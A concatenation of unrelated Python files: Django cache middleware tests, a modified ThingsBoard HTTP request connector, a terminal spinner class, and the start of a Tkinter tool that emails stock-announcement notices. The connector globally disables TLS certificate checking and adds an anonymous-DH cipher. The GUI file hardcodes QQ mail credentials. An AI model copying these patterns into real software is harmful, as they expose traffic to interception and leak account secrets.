key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHE_MIDDLEWARE_ANONYMOUS_ONLY=False,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(IgnoreDeprecationWarningsMixin, TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache_anonymous_only, False)
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_anonymous_only, False)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_anonymous_only=True, cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache_anonymous_only, True)
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertEqual(result, None)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertEqual(result, None)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertNotEqual(result, None)
self.assertEqual(result.content, b'Hello World 1')
@override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
def test_cache_middleware_anonymous_only_wont_cause_session_access(self):
""" The cache middleware shouldn't cause a session access due to
CACHE_MIDDLEWARE_ANONYMOUS_ONLY if nothing else has accessed the
session. Refs 13283 """
from django.contrib.sessions.middleware import SessionMiddleware
from django.contrib.auth.middleware import AuthenticationMiddleware
middleware = CacheMiddleware()
session_middleware = SessionMiddleware()
auth_middleware = AuthenticationMiddleware()
request = self.factory.get('/view_anon/')
# Put the request through the request middleware
session_middleware.process_request(request)
auth_middleware.process_request(request)
result = middleware.process_request(request)
self.assertEqual(result, None)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
session_middleware.process_response(request, response)
response = middleware.process_response(request, response)
self.assertEqual(request.session.accessed, False)
@override_settings(CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True)
def test_cache_middleware_anonymous_only_with_cache_page(self):
"""CACHE_MIDDLEWARE_ANONYMOUS_ONLY should still be effective when used
with the cache_page decorator: the response to a request from an
authenticated user should not be cached."""
request = self.factory.get('/view_anon/')
class MockAuthenticatedUser(object):
def is_authenticated(self):
return True
class MockAccessedSession(object):
accessed = True
request.user = MockAuthenticatedUser()
request.session = MockAccessedSession()
response = cache_page(60)(hello_world_view)(request, '1')
self.assertFalse("Cache-Control" in response)
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the Etag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = TemplateResponse(HttpResponse(), Template("This is a test"))
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = TemplateResponse(HttpResponse(), Template("This is a test"))
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = TemplateResponse(HttpResponse(), Template("This is a test"))
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
response = TemplateResponse(HttpResponse(), Template("This is a test"))
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestEtagWithAdmin(TestCase):
# See https://code.djangoproject.com/ticket/16003
urls = "admin_views.urls"
def test_admin(self):
with self.settings(USE_ETAGS=False):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertFalse(response.has_header('ETag'))
with self.settings(USE_ETAGS=True):
response = self.client.get('/test_admin/admin/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertTrue(cache1 is cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertFalse(c[0] is c[1])
|
request_connector.py
|
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ssl
from time import sleep
from datetime import datetime, timedelta
from threading import Thread
from queue import Queue
from random import choice
from string import ascii_lowercase
from time import sleep, time
from re import fullmatch
from json import JSONDecodeError
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
try:
from requests import Timeout, request
except ImportError:
print("Requests library not found - installing...")
TBUtility.install_package("requests")
from requests import Timeout, request
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import requests
from requests.auth import HTTPBasicAuth
from requests.exceptions import RequestException
from thingsboard_gateway.connectors.connector import Connector, log
from thingsboard_gateway.connectors.request.json_request_uplink_converter import JsonRequestUplinkConverter
from thingsboard_gateway.connectors.request.json_request_downlink_converter import JsonRequestDownlinkConverter
from scipy import rand
# pylint: disable=E1101
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':ADH-AES128-SHA256'
class RequestConnector(Connector, Thread):
def __init__(self, gateway, config, connector_type):
super().__init__()
self.statistics = {'MessagesReceived': 0,
'MessagesSent': 0}
self.__rpc_requests = []
self.__config = config
self.__connector_type = connector_type
self.__gateway = gateway
self.__security = HTTPBasicAuth(self.__config["security"]["username"], self.__config["security"]["password"]) if self.__config["security"]["type"] == "basic" else None
self.__host = None
self.__service_headers = {}
if "http://" in self.__config["host"].lower() or "https://" in self.__config["host"].lower():
self.__host = self.__config["host"]
else:
self.__host = "http://" + self.__config["host"]
context = ssl._create_default_https_context = ssl._create_unverified_context
self.__ssl_verify = self.__config.get("SSLVerify", False)
self.__scanPeriod = 1
self.setName(self.__config.get("name", "".join(choice(ascii_lowercase) for _ in range(5))))
self.daemon = True
self.__connected = False
self.__stopped = False
self.__requests_in_progress = []
self.__convert_queue = Queue(1000000)
self.__attribute_updates = []
self.__fill_attribute_updates()
self.__fill_rpc_requests()
self.__fill_requests()
def run(self):
while not self.__stopped:
if self.__requests_in_progress:
for request in self.__requests_in_progress:
if time() >= request["next_time"]:
thread = Thread(target=self.__send_request, args=(request, self.__convert_queue, log), daemon=True, name="Request to endpoint \'%s\' Thread" % (request["config"].get("url")))
sleep(rand()%1)
thread.start()
else:
sleep(.1)
self.__process_data()
def on_attributes_update(self, content):
try:
for attribute_request in self.__attribute_updates:
if fullmatch(attribute_request["deviceNameFilter"], content["device"]) and fullmatch(attribute_request["attributeFilter"], list(content["data"].keys())[0]):
converted_data = attribute_request["converter"].convert(attribute_request, content)
response_queue = Queue(1)
request_dict = {"config": {**attribute_request,
**converted_data},
"request": request}
attribute_update_request_thread = Thread(target=self.__send_request,
args=(request_dict, response_queue, log),
daemon=True,
name="Attribute request to %s" % (converted_data["url"]))
attribute_update_request_thread.start()
attribute_update_request_thread.join()
if not response_queue.empty():
response = response_queue.get_nowait()
log.debug(response)
del response_queue
except Exception as e:
log.exception(e)
def server_side_rpc_handler(self, content):
try:
for rpc_request in self.__rpc_requests:
if fullmatch(rpc_request["deviceNameFilter"], content["device"]) and fullmatch(rpc_request["methodFilter"], content["data"]["method"]):
converted_data = rpc_request["converter"].convert(rpc_request, content)
response_queue = Queue(1)
request_dict = {"config": {**rpc_request,
**converted_data},
"request": request}
request_dict["config"].get("uplink_converter")
rpc_request_thread = Thread(target=self.__send_request,
args=(request_dict, response_queue, log),
daemon=True,
name="RPC request to %s" % (converted_data["url"]))
rpc_request_thread.start()
rpc_request_thread.join()
if not response_queue.empty():
response = response_queue.get_nowait()
log.debug(response)
self.__gateway.send_rpc_reply(device=content["device"], req_id=content["data"]["id"], content=response[2])
self.__gateway.send_rpc_reply(success_sent=True)
del response_queue
except Exception as e:
log.exception(e)
def __fill_requests(self):
log.debug(self.__config["mapping"])
for endpoint in self.__config["mapping"]:
try:
log.debug(endpoint)
converter = None
if endpoint["converter"]["type"] == "custom":
module = TBUtility.check_and_import(self.__connector_type, endpoint["converter"]["extension"])
if module is not None:
log.debug('Custom converter for url %s - found!', endpoint["url"])
converter = module(endpoint)
else:
log.error("\n\nCannot find extension module for %s url.\nPlease check your configuration.\n", endpoint["url"])
else:
converter = JsonRequestUplinkConverter(endpoint)
self.__requests_in_progress.append({"config": endpoint,
"converter": converter,
"next_time": time(),
"request": request})
except Exception as e:
log.exception(e)
def __fill_attribute_updates(self):
for attribute_request in self.__config.get("attributeUpdates", []):
if attribute_request.get("converter") is not None:
converter = TBUtility.check_and_import("request", attribute_request["converter"])(attribute_request)
else:
converter = JsonRequestDownlinkConverter(attribute_request)
attribute_request_dict = {**attribute_request, "converter": converter}
self.__attribute_updates.append(attribute_request_dict)
def __fill_rpc_requests(self):
for rpc_request in self.__config.get("serverSideRpc", []):
if rpc_request.get("converter") is not None:
converter = TBUtility.check_and_import("request", rpc_request["converter"])(rpc_request)
else:
converter = JsonRequestDownlinkConverter(rpc_request)
rpc_request_dict = {**rpc_request, "converter": converter}
self.__rpc_requests.append(rpc_request_dict)
def format_time_to_endpoint(self, datetime_from):
datetime_from = datetime_from.replace(".", '.000Z')
datetime_from = datetime_from.replace(datetime_from[10], "T")
datetime_from = datetime_from[:24]
return datetime_from
def format_url(self, url, request):
datetime_from = datetime.now()
hours_back = 24
#if self.__scanPeriod <= request["config"].get("scanPeriod"):
# self.__scanPeriod = request["config"].get("scanPeriod") + 1
self.__scanPeriod = request["config"].get("scanPeriod")
#seconds_back = request["config"].get("scanPeriod")
batch = self.__config.get("get_batch_of_data")
if batch:
batch_size = self.__config.get("batch_size")
else:
batch_size = 1
datetime_from = datetime_from - timedelta(hours=hours_back)
datetime_to = datetime_from + timedelta(seconds=self.__scanPeriod * batch_size)
datetime_from = self.format_time_to_endpoint(str(datetime_from))
datetime_to = self.format_time_to_endpoint(str(datetime_to))
final_url = url + "&from=" + datetime_from + "&to=" + datetime_to
#print("batch_size: ", batch_size, "-----------------------------------")
return final_url
def __send_request(self, request, converter_queue, logger):
url = ""
try:
request["next_time"] = time() + request["config"].get("scanPeriod", 10)
request_url_from_config = request["config"]["url"]
request_url_from_config = str('/' + request_url_from_config) if request_url_from_config[0] != '/' else request_url_from_config
logger.debug(request_url_from_config)
url = self.__host + request_url_from_config
url = self.format_url(url, request)
logger.debug(url)
request_timeout = request["config"].get("timeout", 1)
params = {
"method": request["config"].get("httpMethod", "GET"),
"url": url,
"timeout": request_timeout,
"allow_redirects": request["config"].get("allowRedirects", False),
"verify": self.__ssl_verify,
"auth": self.__security,
"data": request["config"].get("data", {})
}
logger.debug(url)
if request["config"].get("httpHeaders") is not None:
params["headers"] = request["config"]["httpHeaders"]
logger.debug("Request to %s will be sent", url)
#response = request["request"](**params)
#print(request)
#print("############################################################")
#print(response, type(response))
#print(self.__scanPeriod)
'''if response.status_code == 500:
self.__scanPeriod *= 2
print(self.__scanPeriod)
'''
#print("sending request...............................................................")
#print(url)
try:
#print("url is ", url)
response = request["request"](**params)
#print("response is ", response)
if response.json() is not None:
pass
except:
for i in range(5):
try:
if response.json() is not None:
break
except:
#print(url)
#print("sleep for 2 seconds")
sleep(2)
response = request["request"](**params)
#print("response is ", response)
#self.statistik[1] += 1
#print(response.json())
if response and response.ok:
#self.__scanPeriod -= 1
if not converter_queue.full():
data_to_storage = [url, request["converter"]]
try:
data_to_storage.append(response.json())
#self.statistik[0] += 1
except UnicodeDecodeError:
data_to_storage.append(response.content())
except JSONDecodeError:
data_to_storage.append(response.content())
if len(data_to_storage) == 3:
converter_queue.put(data_to_storage)
self.statistics["MessagesReceived"] = self.statistics["MessagesReceived"] + 1
else:
logger.error("Request to URL: %s finished with code: %i", url, response.status_code)
except Timeout:
logger.error("Timeout error on request %s.", url)
except RequestException as e:
logger.error("Cannot connect to %s. Connection error.", url)
logger.debug(e)
except ConnectionError:
logger.error("Cannot connect to %s. Connection error.", url)
except Exception as e:
logger.exception(e)
#print(self.statistik)
def __process_data(self):
try:
if not self.__convert_queue.empty():
url, converter, data = self.__convert_queue.get()
data_to_send = {}
if self.__config.get("get_batch_of_data") is False:
#print("11111111111111111111")
if isinstance(data, list):
for data_item in data:
converted_data = converter.convert(url, data_item)
if data_to_send.get(converted_data["deviceName"]) is None:
data_to_send[converted_data["deviceName"]] = converted_data
else:
if converted_data["telemetry"]:
data_to_send[converted_data["deviceName"]]["telemetry"].append(converted_data["telemetry"][0])
if converted_data["attributes"]:
data_to_send[converted_data["deviceName"]]["attributes"].append(converted_data["attributes"][0])
for device in data_to_send:
self.__gateway.send_to_storage(self.get_name(), data_to_send[device])
self.statistics["MessagesSent"] = self.statistics["MessagesSent"] + 1
log.debug(data_to_send)
else:
data_to_send = converter.convert(url, data)
self.__gateway.send_to_storage(self.get_name(), data_to_send)
self.statistics["MessagesSent"] = self.statistics["MessagesSent"] + 1
log.debug(data_to_send)
else:
#print("2222222222222222222")
data_to_send = converter.convert(url, data)
self.real_time_sim_of_batch(self.__config, data_to_send)
log.debug(data_to_send)
else:
sleep(.01)
except Exception as e:
log.exception(e)
def real_time_sim_of_batch(self, config, data):
try:
#print("new values###################################")
time_to_sleep = self.get_time(data)
#print(time_to_sleep)
data_to_check = data["telemetry"]
length_of_arr = 0
for sensor in data_to_check:
for j in sensor:
length_of_arr = len(sensor[j])
dict_result = {"deviceName": data["deviceName"], "deviceType": "default", "attributes": [], "telemetry": []}
i = 0
for length_of_arr in range(length_of_arr):
for sensor in data_to_check:
for j in sensor:
dict_result["telemetry"].append({j : sensor[j][i]["value"]})
i += 1
self.__gateway.send_to_storage(self.get_name(), dict_result)
self.statistics["MessagesSent"] = self.statistics["MessagesSent"] + 1
dict_result = {"deviceName": data["deviceName"], "deviceType": "default", "attributes": [], "telemetry": []}
sleep(time_to_sleep)
#log.debug(data_to_send)
except Exception as e:
log.exception(e)
def get_time(self, data):
try:
for sensor in data["telemetry"][0]:
endTime = data["telemetry"][0][sensor][1]["time"]
startTime = data["telemetry"][0][sensor][0]["time"]
startTime = startTime[11:19]
startHour = startTime[:2]
startMin = startTime[3:5]
startSec = startTime[6:9]
endTime = endTime[11:19]
endHour = endTime[:2]
endMin = endTime[3:5]
endSec = endTime[6:9]
startTime = 3600*int(startHour) + 60*int(startMin) + int(startSec)
endTime = 3600*int(endHour) + 60*int(endMin) + int(endSec)
return endTime - startTime
except Exception as e:
log.exception(e)
def get_name(self):
return self.name
def is_connected(self):
return self.__connected
def open(self):
self.__stopped = False
self.start()
def close(self):
self.__stopped = True
|
spinner.py
|
# From: https://stackoverflow.com/a/39504463
# License: Creative Commons Attribution-Share Alike
# Copyright: Victor Moyseenko
import sys
import threading
import time
class Spinner:
running = False
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in "|/-\\":
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
try:
if sys.stdout.isatty():
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write("\b")
sys.stdout.flush()
except Exception:
# we don't care what happens here
pass
self.running = False
def start(self):
self.running = True
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self, exception=None):
self.busy = False
time.sleep(self.delay)
while self.running:
pass
sys.stdout.write(" ")
sys.stdout.flush()
sys.stdout.write("\b")
sys.stdout.flush()
if exception is not None:
return False
def __enter__(self):
self.start()
return self
def __exit__(self, exception, value, tb):
return self.stop(exception)
|
gui.py
|
#!/usr/bin/env python
# _*_ coding:utf-8 _*_
# @Author : lusheng
import os
from tkinter import *
from tkinter import messagebox
import sqlite3
from datetime import datetime, date, timedelta
import time
import requests
import re
import json
from email.utils import parseaddr, formataddr
import smtplib
from email.mime.text import MIMEText
from email.header import Header
from email.mime.multipart import MIMEMultipart
import logging
import pywintypes
import win32api
import win32gui
import win32con
from threading import Thread
def init_db():
# 连接
conn = sqlite3.connect("announcement.db")
c = conn.cursor()
# 创建表
c.execute('''DROP TABLE IF EXISTS announcement ''') # 删除旧表,如果存在(因为这是临时数据)
c.execute('''
CREATE TABLE announcement (
id INTEGER PRIMARY KEY AUTOINCREMENT,
companyCd INTEGER ,
companyName text,
title text,
publishDate text,
filePath text)
''')
conn.commit()
conn.close()
label70 = Label(root, text='数据库初始化成功', font=('楷体', 10), fg='black')
label70.grid(row=7, column=0, columnspan=2, sticky=W)
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((
Header(name, 'utf-8').encode(),
addr))
# 发送邮件
def sendMails(receivers, companyCd, companyName, disclosureTitle, publishDate, destFilePath):
mail_host = "smtp.qq.com" # 设置服务器
mail_user = "228383562@qq.com" # 用户名
mail_pass = "waajnvtmdhiucbef" # 口令
sender = '228383562@qq.com'
#
# mail_user = "610559273@qq.com" # 用户名
# mail_pass = "xrljvzsvdzbbbfbb" # 口令
# sender = '610559273@qq.com'
receiversName = '收件邮箱'
receivers = receivers
mail_msg = """
公司代码:%s <br>
公司名称:%s <br>
公告日期:%s <br>
公告标题:%s <br>
公告链接:%s <br>
<p>这是全国中小企业股份转让系统查询推送</p>
""" % (companyCd, companyName, publishDate, disclosureTitle, destFilePath)
main_msg = MIMEMultipart()
